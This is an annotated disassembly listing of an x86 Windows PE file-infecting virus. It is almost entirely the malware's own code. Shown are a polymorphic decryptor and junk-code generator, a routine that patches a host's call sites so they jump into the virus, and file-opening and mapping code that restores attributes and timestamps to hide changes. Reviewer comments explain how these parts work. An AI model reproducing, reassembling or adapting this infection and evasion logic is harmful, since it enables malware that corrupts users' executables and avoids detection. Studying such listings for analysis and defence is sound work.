    sub [esp+0Ch+var_C], ebx
    sub [esp+0Ch+var_C], ecx
    pop ebx                             ; ebx = 15*ebx - cl
    inc eax
    jmp short loc_31434119
; ---------------------------------------------------------------------------

loc_31434130: ; CODE XREF: sub_31434060+BCj
    cmp ebx, 0DDBBD70Fh
    jz short loc_31434176
    cmp ebx, 0DB6E45A8h
    jz short loc_31434176
    cmp ebx, 0FFA13B59h
    jz short loc_31434176
    cmp ebx, 0ACB522D6h
    jz short loc_31434176
    cmp ebx, 0F358E993h
    jz short loc_31434176
    cmp ebx, 0F358E97Dh
    jz short loc_31434176
    cmp ebx, 0E1253F46h
    jz short loc_31434176
    cmp ebx, 0E1253F30h
    jz short loc_31434176
    call dword ptr [ebp+403992h]        ; per-entry callback (may not return here)

loc_31434176: ; CODE XREF: sub_31434060+D6j
; sub_31434060+DEj ...
    pop ebx
    jmp loc_314340ED
; ---------------------------------------------------------------------------

loc_3143417C: ; CODE XREF: sub_31434060+92j
    pop esi

loc_3143417D: ; CODE XREF: sub_31434060+60j
; sub_31434060+6Cj
    add edx, 14h
    jmp loc_31434074
; ---------------------------------------------------------------------------

locret_31434185: ; CODE XREF: sub_31434060+18j
; sub_31434060+22j
    retn
sub_31434060 endp

; ---------------------------------------------------------------------------
    db 3

; =============== S U B R O U T I N E =======================================
; sub_31434187 - write a short, randomly varied byte sequence at edi.
; In:  edi = output cursor. Uses sub_314337A4 for every choice.
; Output: first a 2-byte `31 /r` form with the same random register number
; (0..3) in both fields, then between 8 and 13 items, each either one byte
; 50h+reg or the byte 68h followed by a dword (a single set bit, or
; 80000000h).
; NOTE(review): in x86 these encodings are xor reg,reg / push reg /
; push imm32, which would make this a generator of filler argument pushes;
; confirm against the caller's use.
; Out: edi advanced. Clobbers eax, ecx, edx.
sub_31434187 proc near ; CODE XREF: UPX2:314342C5p
; UPX2:314342EBp
    push 4
    pop eax
    call sub_314337A4                   ; dl = 0..3
    mov [ebp+4024D1h], dl               ; remember the register number
    mov ax, 1831h
    add ah, dl
    shl ah, 3
    add ah, dl                          ; ah = 0C0h + 9*dl
    stosw
    push 6
    pop eax
    call sub_314337A4
    add edx, 8
    xchg edx, ecx                       ; ecx = item count, 8..13

loc_314341AF: ; CODE XREF: sub_31434187:loc_314341EEj
    push 5
    pop eax
    call sub_314337A4                   ; dl = 0..4 selects the item kind
    cmp dl, 3
    jnb short loc_314341C7
    mov al, 50h
    add al, [ebp+4024D1h]
    stosb
    jmp short loc_314341EE
; ---------------------------------------------------------------------------

loc_314341C7: ; CODE XREF: sub_31434187+33j
    push 68h
    pop eax
    stosb
    cmp dl, 3
    jnz short loc_314341E8
    mov al, 11h                         ; eax = 11h here (upper bytes are 0 from the pop above)
    call sub_314337A4                   ; dl = shift count below 11h
    mov eax, 1

loc_314341DC: ; CODE XREF: sub_31434187+5Dj
    test dl, dl
    jz short loc_314341ED
    shl eax, 1
    dec dl
    jmp short loc_314341DC
; ---------------------------------------------------------------------------
    jmp short loc_314341ED              ; unreachable as listed (follows an unconditional jmp)
; ---------------------------------------------------------------------------

loc_314341E8: ; CODE XREF: sub_31434187+47j
    mov eax, 80000000h

loc_314341ED: ; CODE XREF: sub_31434187+57j
; sub_31434187+5Fj
    stosd

loc_314341EE: ; CODE XREF: sub_31434187+3Ej
    loop
loc_314341AF retn sub_31434187 endp ; --------------------------------------------------------------------------- loc_314341F1: ; CODE XREF: sub_31434C4B+112p lea edi, [ebp+40343Ch] test dword ptr [ebp+403431h], 80000000h jz short loc_31434206 mov al, 60h stosb loc_31434206: ; CODE XREF: UPX2:31434201j test dword ptr [ebp+403431h], 1000003h jz loc_3143430C ; --------------------------------------------------------------------------- db 0B8h ; --------------------------------------------------------------------------- push ebp mov ebp, esp call near ptr 0EECCEDCAh xchg eax, esi cmp [eax+0], eax mov al, 0E8h stosb stosd test dword ptr [ebp+403431h], 1000000h mov [ebp+40399Ah], edi jz short loc_31434284 test dword ptr [ebp+403431h], 2000000h mov eax, 36FF6467h jnz short loc_3143424F mov eax, 2E8B6467h loc_3143424F: ; CODE XREF: UPX2:31434248j stosd mov ax, 0 stosw jz short loc_3143425B mov al, 5Dh stosb loc_3143425B: ; CODE XREF: UPX2:31434256j test dword ptr [ebp+403431h], 8000000h mov eax, 86D8Dh jnz short loc_31434282 test dword ptr [ebp+403431h], 4000000h mov eax, 8C583h jz short loc_31434282 mov eax, 0F8ED83h loc_31434282: ; CODE XREF: UPX2:3143426Aj ; UPX2:3143427Bj stosd dec edi loc_31434284: ; CODE XREF: UPX2:31434237j test dword ptr [ebp+403431h], 3 jz short loc_31434294 mov al, 0E9h stosb stosd loc_31434294: ; CODE XREF: UPX2:3143428Ej mov eax, [ebp+403996h] mov ecx, edi sub ecx, eax mov [eax-4], ecx test dword ptr [ebp+403431h], 3 jz short loc_3143430C mov eax, 36FF6467h mov [ebp+40399Eh], edi stosd mov eax, 64670000h stosd mov eax, 2689h stosd call sub_31434187 mov al, 20h call sub_31433FA0 jecxz short loc_3143430C mov ax, 15FFh stosw xchg eax, ecx stosd mov edx, [ebp+403431h] not edx test edx, 3 jnz short loc_314342FF call sub_31434187 mov al, 1Fh call sub_31433FA0 mov ax, 15FFh stosw xchg eax, ecx stosd loc_314342FF: ; CODE XREF: UPX2:314342E9j mov ecx, edi mov eax, [ebp+40399Eh] sub ecx, eax mov [eax-4], ecx loc_3143430C: ; CODE XREF: UPX2:31434210j ; 
UPX2:314342ABj ... test dword ptr [ebp+403431h], 4 jz short loc_3143432A mov eax, 0C8FEC029h stosd mov eax, 474C008h stosd mov eax, 67EBF875h stosd loc_3143432A: ; CODE XREF: UPX2:31434316j test dword ptr [ebp+403431h], 8 jnz short loc_31434380 cmp byte ptr [ebp+40342Fh], 0 jz short loc_31434380 mov eax, 0C9291829h or ah, [ebp+40342Bh] shl ah, 3 or ah, [ebp+40342Bh] stosd mov al, 0B1h stosb mov al, [ebp+40342Fh] stosb mov al, 40h or al, [ebp+40342Bh] stosb mov ax, 0FDE2h test dword ptr [ebp+403431h], 10h jz short loc_3143437E mov al, 49h stosb mov ax, 0FC75h loc_3143437E: ; CODE XREF: UPX2:31434375j stosw loc_31434380: ; CODE XREF: UPX2:31434334j ; UPX2:3143433Dj mov al, 0E8h stosb xor eax, eax stosd mov [ebp+403982h], edi test dword ptr [ebp+403431h], 20h jnz short loc_314343A1 mov al, 58h or al, [ebp+403429h] stosb loc_314343A1: ; CODE XREF: UPX2:31434396j mov ax, 0C081h test dword ptr [ebp+403431h], 40h jz short loc_314343B4 add ah, 28h loc_314343B4: ; CODE XREF: UPX2:314343AFj or ah, [ebp+403429h] stosw mov [ebp+403986h], edi stosd test dword ptr [ebp+403431h], 40000000h jnz short loc_314343D8 mov al, 50h add al, [ebp+403429h] stosb loc_314343D8: ; CODE XREF: UPX2:314343CDj test dword ptr [ebp+403431h], 80h jnz short loc_314343EF mov al, 0B8h or al, [ebp+40342Ah] stosb jmp short loc_3143442C ; --------------------------------------------------------------------------- loc_314343EF: ; CODE XREF: UPX2:314343E2j mov ax, 1831h test dword ptr [ebp+403431h], 100h jz short loc_31434401 mov al, 29h loc_31434401: ; CODE XREF: UPX2:314343FDj or ah, [ebp+40342Ah] shl ah, 3 or ah, [ebp+40342Ah] stosw mov ax, 0F081h test dword ptr [ebp+403431h], 200h jnz short loc_31434424 mov ah, 0C8h loc_31434424: ; CODE XREF: UPX2:31434420j or ah, [ebp+40342Ah] stosw loc_3143442C: ; CODE XREF: UPX2:314343EDj mov [ebp+4039A2h], edi mov eax, 243Ch stosd test dword ptr [ebp+403431h], 8 jz short loc_314344B0 test dword ptr [ebp+403431h], 400h jnz short loc_3143445B mov al, 0B8h or al, 
[ebp+40342Bh] stosb jmp short loc_314344A8 ; --------------------------------------------------------------------------- loc_3143445B: ; CODE XREF: UPX2:3143444Ej test dword ptr [ebp+403431h], 800h jnz short loc_31434478 mov ax, 0E083h or ah, [ebp+40342Bh] stosw xor eax, eax stosb jmp short loc_3143448D ; --------------------------------------------------------------------------- loc_31434478: ; CODE XREF: UPX2:31434465j mov ax, 1829h or ah, [ebp+40342Bh] shl ah, 3 or ah, [ebp+40342Bh] stosw loc_3143448D: ; CODE XREF: UPX2:31434476j test dword ptr [ebp+403431h], 1000h mov ax, 0C081h jz short loc_314344A0 add ah, 8 loc_314344A0: ; CODE XREF: UPX2:3143449Bj or ah, [ebp+40342Bh] stosw loc_314344A8: ; CODE XREF: UPX2:31434459j movzx eax, byte ptr [ebp+40342Fh] stosd loc_314344B0: ; CODE XREF: UPX2:31434442j test dword ptr [ebp+403431h], 40000000h jz short loc_314344C5 mov al, 50h add al, [ebp+403429h] stosb loc_314344C5: ; CODE XREF: UPX2:314344BAj test dword ptr [ebp+403431h], 2000h mov al, 86h jnz short loc_314344D5 add al, 4 loc_314344D5: ; CODE XREF: UPX2:314344D1j lea ecx, [edi-2] mov ah, [ebp+403429h] mov [ebp+40398Ah], ecx stosw cmp ah, 5 jnz short loc_314344F2 mov al, 0 or byte ptr [edi-1], 40h stosb loc_314344F2: ; CODE XREF: UPX2:314344E9j test dword ptr [ebp+403431h], 4000h mov ax, 3166h jnz short loc_31434504 mov ah, 29h loc_31434504: ; CODE XREF: UPX2:31434500j stosw mov al, 18h or al, [ebp+40342Bh] shl al, 3 stosb mov al, 88h test dword ptr [ebp+403431h], 8000h jnz short loc_31434522 mov al, 86h loc_31434522: ; CODE XREF: UPX2:3143451Ej mov ah, [ebp+403429h] stosw cmp ah, 5 jnz short loc_31434536 mov al, 0 or byte ptr [edi-1], 40h stosb loc_31434536: ; CODE XREF: UPX2:3143452Dj test dword ptr [ebp+403431h], 10000h jnz short loc_3143454D mov al, 40h or al, [ebp+403429h] stosb jmp short loc_3143455C ; --------------------------------------------------------------------------- loc_3143454D: ; CODE XREF: UPX2:31434540j mov ax, 0C083h or ah, [ebp+403429h] 
stosw mov al, 1 stosb loc_3143455C: ; CODE XREF: UPX2:3143454Bj test dword ptr [ebp+403431h], 20000h jnz short loc_31434597 test dword ptr [ebp+403431h], 40000h jnz short loc_3143458E mov al, 0C0h or al, [ebp+40342Bh] mov ah, [ebp+403430h] shl eax, 10h mov ax, 8166h stosd mov al, 0 jmp short loc_31434596 ; --------------------------------------------------------------------------- loc_3143458E: ; CODE XREF: UPX2:31434572j mov al, 40h or al, [ebp+40342Bh] loc_31434596: ; CODE XREF: UPX2:3143458Cj stosb loc_31434597: ; CODE XREF: UPX2:31434566j test dword ptr [ebp+403431h], 80000h jnz short loc_314345B3 mov ax, 0E883h or ah, [ebp+40342Ah] stosw mov al, 1 jmp short loc_314345BB ; --------------------------------------------------------------------------- loc_314345B3: ; CODE XREF: UPX2:314345A1j mov al, 48h or al, [ebp+40342Ah] loc_314345BB: ; CODE XREF: UPX2:314345B1j stosb test dword ptr [ebp+403431h], 100000h mov cl, 75h jnz short loc_314345EF mov ax, 0F883h or ah, [ebp+40342Ah] stosw xor eax, eax stosb sub [ebp+40398Ah], edi test dword ptr [ebp+403431h], 200000h jnz short loc_3143460A mov cl, 77h jmp short loc_3143460A ; --------------------------------------------------------------------------- loc_314345EF: ; CODE XREF: UPX2:314345C8j mov ax, 1809h or ah, [ebp+40342Ah] shl ah, 3 or ah, [ebp+40342Ah] stosw sub [ebp+40398Ah], edi loc_3143460A: ; CODE XREF: UPX2:314345E9j ; UPX2:314345EDj mov al, cl mov ah, [ebp+40398Ah] stosw mov al, 58h add al, [ebp+403429h] stosb test dword ptr [ebp+403431h], 1000003h jz loc_314346B4 mov eax, 268B6467h mov ecx, [ebp+403431h] xor ecx, 2000000h test ecx, 3000000h jnz short loc_3143464B mov eax, 2E876467h loc_3143464B: ; CODE XREF: UPX2:31434644j stosd mov eax, 0 stosw jnz short loc_3143465B mov ax, 0E58Bh stosw loc_3143465B: ; CODE XREF: UPX2:31434653j mov eax, 68F6764h stosd xor eax, eax stosw test dword ptr [ebp+403431h], 1000000h jnz short loc_314346B1 test dword ptr [ebp+403431h], 8000000h jz short loc_314346A3 mov ax, 6C8Dh 
test dword ptr [ebp+403431h], 2000000h setnz cl or ah, cl stosw test cl, cl jnz short loc_3143469E mov ax, 424h stosw jmp short loc_314346B1 ; --------------------------------------------------------------------------- loc_3143469E: ; CODE XREF: UPX2:31434694j mov al, 8 stosb jmp short loc_314346B1 ; --------------------------------------------------------------------------- loc_314346A3: ; CODE XREF: UPX2:3143467Bj mov ax, 5D58h add al, [ebp+40342Bh] stosw jmp short loc_314346B4 ; --------------------------------------------------------------------------- loc_314346B1: ; CODE XREF: UPX2:3143466Fj ; UPX2:3143469Cj ... mov al, 0C9h stosb loc_314346B4: ; CODE XREF: UPX2:31434627j ; UPX2:314346AFj test dword ptr [ebp+403431h], 80000000h jz short loc_314346E0 mov al, 7 sub al, [ebp+403429h] shl eax, 1Ah or eax, 240889h add ah, [ebp+403429h] shl ah, 3 add ah, 4 stosd mov al, 61h stosb loc_314346E0: ; CODE XREF: UPX2:314346BEj mov ax, 0E0FFh or ah, [ebp+403429h] stosw test dword ptr [ebp+403431h], 20h jz short loc_3143474B test dword ptr [ebp+403431h], 20000000h jz short loc_31434711 loc_31434704: ; CODE XREF: UPX2:3143470Fj test edi, 3 jz short loc_31434711 mov al, 90h stosb jmp short loc_31434704 ; --------------------------------------------------------------------------- loc_31434711: ; CODE XREF: UPX2:31434702j ; UPX2:3143470Aj mov eax, edi mov ecx, [ebp+403982h] sub eax, ecx mov [ecx-4], eax mov al, 58h or al, [ebp+403429h] stosb test dword ptr [ebp+403431h], 400000h jz short loc_3143473F mov ax, 0C350h or al, [ebp+403429h] jmp short loc_31434749 ; --------------------------------------------------------------------------- loc_3143473F: ; CODE XREF: UPX2:31434731j mov ax, 0E0FFh or ah, [ebp+403429h] loc_31434749: ; CODE XREF: UPX2:3143473Dj stosw loc_3143474B: ; CODE XREF: UPX2:314346F6j test dword ptr [ebp+403431h], 1000003h jz short loc_314347CA test dword ptr [ebp+403431h], 20000000h jz short loc_31434770 loc_31434763: ; CODE XREF: UPX2:3143476Ej test edi, 3 jz 
short loc_31434770                              ; operand of the `jz` that ends the previous line
        ; NOTE(review): everything down to `retn 4` is the tail of a routine that
        ; starts before this excerpt.  The values it stores through edi (90h, 8Bh,
        ; 31h C0h, 8Fh, 0C3h) are valid x86 opcode bytes, so it appears to be
        ; emitting code into an output buffer -- confirm against the routine's start.
        mov al, 90h
        stosb                                   ; store one 90h byte (the NOP encoding) at [edi]
        jmp short loc_31434763
; ---------------------------------------------------------------------------
loc_31434770: ; CODE XREF: UPX2:31434761j ; UPX2:31434769j
        mov ecx, edi
        mov eax, [ebp+40399Ah]
        sub ecx, eax
        mov [eax-4], ecx                        ; back-patch the dword just before the saved address with (edi - saved address)
        xor ecx, ecx
        test dword ptr [ebp+403431h], 800000h
        jnz short loc_31434799
        lea eax, [ebp+403429h]
loc_31434791: ; CODE XREF: UPX2:31434797j
        mov cl, [eax]                           ; walk the byte table at [ebp+403429h] until an entry below 3 is found
        inc eax
        cmp cl, 3
        jnb short loc_31434791
loc_31434799: ; CODE XREF: UPX2:31434789j
        lea eax, ds:102444h[ecx*8]
        shl eax, 8
        mov al, 8Bh
        stosd                                   ; emits 8Bh followed by three bytes derived from ecx
        jecxz short loc_314347AE
        mov ax, 0C031h
        stosw                                   ; bytes 31h C0h (encoding of xor eax, eax)
loc_314347AE: ; CODE XREF: UPX2:314347A6j
        mov ax, 808Fh
        push 0B8h
        add ah, cl
        stosw                                   ; bytes 8Fh, (80h+cl)
        pop eax
        stosd                                   ; dword 000000B8h
        test ecx, ecx
        jnz short loc_314347C7
        mov ax, 0C031h
        stosw
loc_314347C7: ; CODE XREF: UPX2:314347BFj
        mov al, 0C3h
        stosb                                   ; byte 0C3h (encoding of retn)
loc_314347CA: ; CODE XREF: UPX2:31434755j
        lea eax, [ebp+40343Ch]                  ; eax = start of the buffer at [ebp+40343Ch]
        test dword ptr [ebp+403431h], 10000000h
        jnz short loc_314347E2
        push edi
        sub edi, eax                            ; edi = number of bytes written since [ebp+40343Ch]
        pop eax
        jmp short loc_314347FB
; ---------------------------------------------------------------------------
loc_314347E2: ; CODE XREF: UPX2:314347DAj
        mov edx, [ebx+28h]
        sub edi, eax
        sub edx, eax
        mov ecx, [ebp+4039A2h]
        add [ebp+403982h], edx
        add [ecx], edi
        mov eax, [esp+4]
loc_314347FB: ; CODE XREF: UPX2:314347E0j
        mov [ebp+40106Dh], edi                  ; length saved here; sub_31434B27 and sub_31434C4B read it back
        mov edi, [ebp+403986h]
        sub eax, [ebp+403982h]
        test dword ptr [ebp+403431h], 40h
        jz short loc_3143481B
        neg eax
loc_3143481B: ; CODE XREF: UPX2:31434817j
        stosd
        retn 4
; =============== S U B R O U T I N E =======================================
; sub_3143481F / sub_314349D8
; IDA split one routine into two procs plus a function chunk (both are marked
; "sp-analysis failed"), so read everything from here to `sub_314349D8 endp`
; as a single unit.  sub_31434C4B calls it only when bit 31 of the flag dword
; at [ebp+403431h] is set.
; What the visible code does: it walks bytes starting at an offset derived from
; [ebx+28h], looking for opcode E8h (call rel32) whose target starts with
; FF 25 (jmp dword ptr [mem]), or for FF 15 (call dword ptr [mem]), and then
; range-checks the referenced memory slot.  On a match it leaves through
; loc_31434A16, otherwise through loc_31434A07.
; NOTE(review): ebx is assumed to point at the PE "NT headers" of the mapped
; file (sub_31434C4B checks for 4550h at [ebx] before calling); sub_31433F59
; and sub_31434060 are not shown and their contracts are inferred only from
; how [ebp+4039A6h] / [ebp+4039AAh] are used afterwards.
sub_3143481F proc near ; CODE XREF: sub_31434C4B+2A8p
        push esi
        push edi
        cmp dword ptr [ebp+4039AEh], 0
        jz loc_31434A07                         ; nothing to do when [ebp+4039AEh] is zero
        call near ptr loc_3143483F+1
        ; NOTE(review): the next twelve "instructions" are data, not code.  Their
        ; opcode bytes are 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C = ASCII
        ; "KERNEL32.DLL", and the call above lands one byte into `add bh, bh`,
        ; i.e. just past a 00 terminator, leaving the string address on the stack.
        dec ebx
        inc ebp
        push edx
        dec esi
        inc ebp
        dec esp
        xor esi, [edx]
        db 2Eh
        inc esp
        dec esp
        dec esp
loc_3143483F: ; CODE XREF: sub_3143481F+Fp
        add bh, bh
sub_3143481F endp ; sp-analysis failed
        ; NOTE(review): because the call target is loc_3143483F+1, the three lines
        ; below are mis-aligned.  Re-decoding from the FFh byte likely gives
        ; `call dword ptr [ebp+403588h]`, `mov [ebp+4039BEh], eax`, `push ebx`
        ; (a module handle stored in [ebp+4039BEh], which is pushed before the
        ; call through [ebp+403548h] further down).  Re-disassemble to confirm.
        xchg eax, ebp
        mov ds:85890040h, dh
        mov esi, 53004039h
        mov ebx, [eax+3Ch]
        add ebx, eax
        push dword ptr [ebx+28h]
        mov eax, [ebx+34h]
        call sub_31433F59
        mov edx, [ebp+4039A6h]
        pop ebx
        add eax, [edx+0Ch]
        mov [ebp+4039C2h], eax                  ; lower bound used by the range check before loc_314349AD
        add eax, [edx+8]
        mov [ebp+4039C6h], eax                  ; upper bound (lower bound + [edx+8])
        mov esi, [ebx+28h]
        push dword ptr [ebx+80h]
        call sub_31433F59
        mov edi, [ebp+4039A6h]                  ; edi = result for the [ebx+80h] lookup, compared against later lookups
        push esi
        call sub_31433F59
        mov edx, [ebp+4039A6h]
        mov ecx, [edx+8]
        add ecx, [edx+0Ch]
        sub ecx, esi
        sub ecx, 5                              ; ecx = bytes left to scan, minus the 5 bytes a call rel32 needs
        js loc_31434A07
        jz loc_31434A07
        add esi, [ebp+4039AAh]
        add esi, [ebp+403972h]                  ; esi = scan pointer inside the mapped view
; START OF FUNCTION CHUNK FOR sub_314349D8
loc_314348B9: ; CODE XREF: sub_314349D8+29j
        lodsb
        cmp al, 0E8h                            ; E8h = call rel32
        jnz loc_31434964
        lea eax, [esi+4]
        sub eax, [ebp+403972h]
        add eax, [esi]                          ; eax = call target, relative to the mapped view
        push eax
        call sub_31433F59
        cmp dword ptr [ebp+4039A6h], 0
        jnz short loc_314348E7
        cmp eax, [edi+0Ch]
        jnb loc_31434A00
        jmp short loc_314348F3
; ---------------------------------------------------------------------------
loc_314348E7: ; CODE XREF: sub_314349D8-FEj
        cmp [ebp+4039A6h], edx
        jnz loc_31434A00
loc_314348F3: ; CODE XREF: sub_314349D8-F3j
        add eax, [ebp+403972h]
        cmp word ptr [eax], 25FFh               ; target must begin with FF 25 (jmp dword ptr [mem])
        jnz loc_31434A00
        mov eax, [eax+2]
        sub eax, [ebx+34h]                      ; memory operand minus [ebx+34h]
        push eax
        call sub_31433F59
        cmp [ebp+4039A6h], edi
        jnz loc_31434A00
        add eax, [ebp+4039AAh]
        add eax, [ebp+403972h]
        mov eax, [eax]                          ; read the dword stored in that slot
        sub eax, [edi+0Ch]
        jb loc_31434A00
        cmp eax, [edi+8]
        jnb loc_31434A00
loc_3143493C: ; CODE XREF: sub_314349D8+22j
        add eax, 2
        add eax, [edi+14h]
        add eax, [ebp+403972h]
        push edx
        push eax
        push dword ptr [ebp+4039BEh]
        call dword ptr [ebp+403548h]            ; NOTE(review): (value from [ebp+4039BEh], pointer) argument pair; API not identified on this page
        pop edx
        test eax, eax
        jnz loc_31434A16
        jmp loc_31434A00
; ---------------------------------------------------------------------------
loc_31434964: ; CODE XREF: sub_314349D8-11Cj
        cmp al, 0FFh
        jnz loc_31434A00
        cmp byte ptr [esi], 15h                 ; FF 15 = call dword ptr [mem]
        jnz loc_31434A00
        mov eax, [esi+1]
        sub eax, [ebx+34h]
        push eax
        call sub_31433F59
        cmp [ebp+4039A6h], edi
        jnz short loc_31434A00
        add eax, [ebp+4039AAh]
        add eax, [ebp+403972h]
        mov [ebp+4039CAh], eax
        mov eax, [eax]
        cmp eax, [ebp+4039C2h]
        jb short loc_314349AD
        cmp eax, [ebp+4039C6h]
        jb short loc_31434A16                   ; slot value lies inside [4039C2h, 4039C6h): accept this call site
loc_314349AD: ; CODE XREF: sub_314349D8-35j
        cmp eax, 70000000h
        jb short loc_314349EB
        call sub_314349D8
        lea ecx, [esi-4]
        mov eax, ecx
        sub eax, [edx]
        add eax, [edx+10h]
        cmp eax, [ebp+4039CAh]
        jnz short locret_314349D7
        add esp, 10h
        push dword ptr [ecx]
        pop [esp-0Ch+arg_24]
        popa
        jmp short loc_314349F2
; ---------------------------------------------------------------------------
locret_314349D7: ; CODE XREF: sub_314349D8-Fj
        retn
; END OF FUNCTION CHUNK FOR sub_314349D8
; =============== S U B R O U T I N E =======================================
sub_314349D8 proc near ; CODE XREF: sub_314349D8-24p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 314348B9 SIZE 0000011F BYTES
        pop dword ptr [ebp+403992h]             ; the return address is popped into a variable, which is why IDA's stack analysis fails
        pusha
        mov esi, [ebp+403972h]
        call sub_31434060
        popa
loc_314349EB: ; CODE XREF: sub_314349D8-26j
        test eax, 80000000h
        jnz short loc_31434A00
loc_314349F2: ; CODE XREF: sub_314349D8-3j
        sub eax, [edi+0Ch]
        jb short loc_31434A00
        cmp eax, [edi+8]
        jb loc_3143493C
loc_31434A00: ; CODE XREF: sub_314349D8-F9j ; sub_314349D8-EBj ...
        dec ecx                                 ; no match at this byte: continue while bytes remain
        jnz loc_314348B9
loc_31434A07: ; CODE XREF: sub_3143481F+9j ; UPX2:314348A1j ...
; Failure exit of the scan (label loc_31434A07 is on the previous line): clear
; bit 31 of the dword at [edi+2431h] and return.
; NOTE(review): 2431h = 403431h - 401000h, so this is presumably the copy of
; the flag dword inside the block that sub_31434C4B copies from [ebp+401000h].
        mov edi, [esp-4+arg_0]
        and dword ptr [edi+2431h], 7FFFFFFFh
        jmp short loc_31434A52
; ---------------------------------------------------------------------------
; Success exit: a call site was accepted.  esi points one byte past its opcode.
loc_31434A16: ; CODE XREF: sub_314349D8-7Fj ; sub_314349D8-2Dj
        or dword ptr [edx+24h], 0E0000060h      ; NOTE(review): if edx is a PE section header, +24h is Characteristics and E0000060h = execute+read+write, code + initialized data
        dec esi                                 ; back up to the first byte of the matched instruction
        xor eax, eax
        mov ecx, [esp+8+var_8]
        xchg eax, [ebp+4039AEh]                 ; take the value of [ebp+4039AEh] and zero it
        lea edi, [ecx+2435h]
        add eax, [ebp+403972h]
        movsw
        movsd                                   ; save the 6 bytes at the matched site to [ecx+2435h]
        dec esi                                 ; esi = site + 5
        sub eax, esi
        add eax, [edx+14h]
        sub eax, [edx+0Ch]
        mov byte ptr [esi-5], 0E8h              ; overwrite the site with E8h (call rel32) ...
        mov dword ptr [ecx+52h], 5
        mov [esi-4], eax                        ; ... and the displacement computed above
loc_31434A52: ; CODE XREF: sub_314349D8+3Cj
        pop edi
        pop esi
        retn
sub_314349D8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; sub_31434A55 -- open the file whose path is in the buffer at [ebp+40384Eh]
; and map it for read/write.
; In:   ebx = number of bytes added to the file size when the mapping is
;       created (callers pass 0 or [ebp+403976h]); ebp = base for all variables.
; Out:  ZF clear on success, ZF set on failure (callers test with `jz`).
;       [ebp+403952h] = value returned by the first call, [ebp+403956h] =
;       handle, [ebp+40395Ah] / [ebp+403962h] = two 8-byte buffers filled by the
;       fourth call, [ebp+40396Ah] = size, [ebp+40396Eh] = mapping handle,
;       [ebp+403972h] = mapped view.
; Failure paths jump into sub_31434F91 so that whatever was opened is released.
; NOTE(review): every API is reached through a pointer slot at [ebp+4035xxh]
; that this page does not resolve.  The names in parentheses are guesses from
; argument shape and return checks only.
; Forensic note: the values captured by the first and fourth calls are written
; back in sub_31434F91, so attributes and timestamps of a modified file may
; look unchanged (assuming the guesses below are right).
sub_31434A55 proc near ; CODE XREF: UPX2:31434C23p ; sub_31434C4B+127p
        lea esi, [ebp+40384Eh]
        push esi
        call dword ptr [ebp+40357Ch]            ; (path) -> -1 on failure  (GetFileAttributesA-shaped)
        cmp eax, 0FFFFFFFFh
        jz locret_31434B26
        mov [ebp+403952h], eax
        push 0
        push esi
        call dword ptr [ebp+4035B4h]            ; (path, 0)  (SetFileAttributesA-shaped: clear attributes)
        test eax, eax
        jz locret_31434B26
        sub eax, eax
        push eax
        push eax
        push 3
        push eax
        push 1
        push 0C0000000h
        push esi
        call dword ptr [ebp+40355Ch]            ; (path, C0000000h, 1, 0, 3, 0, 0)  (CreateFileA-shaped: read/write, open existing)
        cmp eax, 0FFFFFFFFh
        jz loc_31434FDE
        mov [ebp+403956h], eax
        lea ecx, [ebp+40395Ah]
        lea edx, [ebp+403962h]
        push ecx
        push edx
        push 0
        push eax
        call dword ptr [ebp+403584h]            ; (handle, 0, &[403962h], &[40395Ah])  (GetFileTime-shaped)
        cmp eax, 0FFFFFFFFh
        jz loc_31434FD2
        push 0
        push dword ptr [ebp+403956h]
        call dword ptr [ebp+403580h]            ; (handle, 0) -> -1 on failure  (GetFileSize-shaped)
        cmp eax, 0FFFFFFFFh
        jz loc_31434FD2
        mov [ebp+40396Ah], eax
        xor ecx, ecx
        add eax, ebx                            ; requested mapping size = file size + ebx
        push ecx
        push eax
        push ecx
        push 4
        push ecx
        push dword ptr [ebp+403956h]
        call dword ptr [ebp+403560h]            ; (handle, 0, 4, 0, size, 0)  (CreateFileMappingA-shaped, 4 = PAGE_READWRITE)
        test eax, eax
        jz loc_31434FD2
        xor ecx, ecx
        mov [ebp+40396Eh], eax
        push ecx
        push ecx
        push ecx
        push 0F001Fh
        push eax
        call dword ptr [ebp+4035A0h]            ; (mapping, F001Fh, 0, 0, 0)  (MapViewOfFile-shaped, F001Fh = FILE_MAP_ALL_ACCESS)
        test eax, eax
        jz loc_31434FAA
        mov [ebp+403972h], eax
locret_31434B26: ; CODE XREF: sub_31434A55+10j ; sub_31434A55+27j ...
; Shared return for sub_31434A55 (label locret_31434B26 is on the previous
; line); sub_31434F91 and the file-name filter also return through it.
        retn
sub_31434A55 endp
; =============== S U B R O U T I N E =======================================
; sub_31434B27 -- compute two size values rounded to the alignments stored in
; the header at ebx.
; In:   ebx = header pointer (NOTE(review): +38h / +3Ch are SectionAlignment /
;       FileAlignment if ebx is the PE NT-headers pointer that sub_31434C4B
;       sets up); [ebp+40106Dh] = extra length.
; Out:  [ebp+40397Ah] = (69CDh [+ [ebp+40106Dh] unless flag 10000000h is set])
;                       rounded to a multiple of [ebx+38h]
;       [ebp+403976h] = (243Bh + [ebp+40106Dh]) rounded to a multiple of [ebx+3Ch]
; Clobbers eax, ecx, edx.
; The rounding is ((n + align) / align) * align, so a value that is already a
; multiple of the alignment still grows by one full unit.  There is no check
; for an alignment field of zero; `div ecx` would fault on such a header.
sub_31434B27 proc near ; CODE XREF: sub_31434C4B+117p ; sub_31434C4B+223p
        mov eax, 69CDh
        mov ecx, [ebx+38h]
        test dword ptr [ebp+403431h], 10000000h
        jnz short loc_31434B41
        add eax, [ebp+40106Dh]
loc_31434B41: ; CODE XREF: sub_31434B27+12j
        xor edx, edx                            ; edx:eax is the dividend, so clear the high half
        add eax, ecx
        div ecx
        mul ecx
        mov [ebp+40397Ah], eax
        mov eax, 243Bh
        mov ecx, [ebx+3Ch]
        add eax, [ebp+40106Dh]
        xor edx, edx
        add eax, ecx
        div ecx
        mul ecx
        mov [ebp+403976h], eax
        retn
sub_31434B27 endp
; =============== S U B R O U T I N E =======================================
; sub_31434B6C -- walk the 28h-byte records that follow the header at ebx, from
; the last one backwards, and pick the last one whose dword at +0Ch is non-zero.
; In:   ebx = header pointer (count at +6, variable header size at +14h,
;       records start at ebx+18h+[ebx+14h] -- the PE section table if ebx is
;       the NT-headers pointer); [ebp+40396Ah] = file size saved by sub_31434A55.
; Out:  edx = selected record; CF is the result and callers test it with `jb`:
